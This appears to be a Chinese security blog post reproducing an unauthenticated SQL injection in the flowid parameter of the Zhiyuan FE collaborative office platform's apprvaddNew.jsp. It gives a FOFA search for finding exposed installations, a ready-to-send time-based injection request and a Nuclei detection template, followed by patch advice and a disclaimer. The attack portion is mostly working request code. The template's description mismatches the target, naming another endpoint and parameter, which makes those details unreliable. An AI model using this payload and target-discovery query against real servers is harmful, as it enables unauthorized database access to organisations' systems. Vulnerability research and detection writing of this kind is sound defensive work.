【漏洞复现】致远互联FE协作办公平台 apprvaddNew.jsp SQL注入

2024-08-11 08:41:38 浏览数 (2)

0x00 漏洞描述

致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。 在受影响的版本中,攻击者可以未授权访问/witapprovemanage/apprvaddNew.jsp接口,利用 flowid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。

影响范围

尚不明确

0x01 测绘工具

FOFA:body=“li_plugins_download”

0x02 漏洞复现

代码语言:javascript复制
POST /witapprovemanage/apprvaddNew.jsp HTTP/1.1
Host: x.x.x.x
User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36
Content-Type:application/x-www-form-urlencoded
 
flowid=1';WAITFOR DELAY '0:0:5'--

0x03 Nuclei检测脚本

代码语言:javascript复制
id: 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入

info:
  name: 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入
  author: admin
  severity: high
  description: 在受影响的版本中,攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。

requests:
  - method: POST
    path:
      - "{{BaseURL}}/witapprovemanage/apprvaddNew.jsp"

    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36

    body: |
      flowid=1';WAITFOR DELAY '0:0:5'--

    matchers:
      - type: word
        words:
          - "SQL"  # Adjust this based on known error messages if applicable

      - type: dsl
        dsl:
          - "response.time > 5000"  # Check if the response time is greater than 5 seconds

0x04 修复建议

关闭互联网暴露面或接口设置访问权限 升级至安全版本

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。 请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。 作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

0 人点赞